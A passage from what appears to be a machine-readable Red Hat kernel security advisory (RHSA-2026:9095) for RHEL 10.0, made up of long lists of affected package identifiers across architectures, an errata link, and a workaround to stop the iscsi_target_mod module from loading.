"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:9095"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent module iscsi_target_mod from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically.",
"product_ids": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
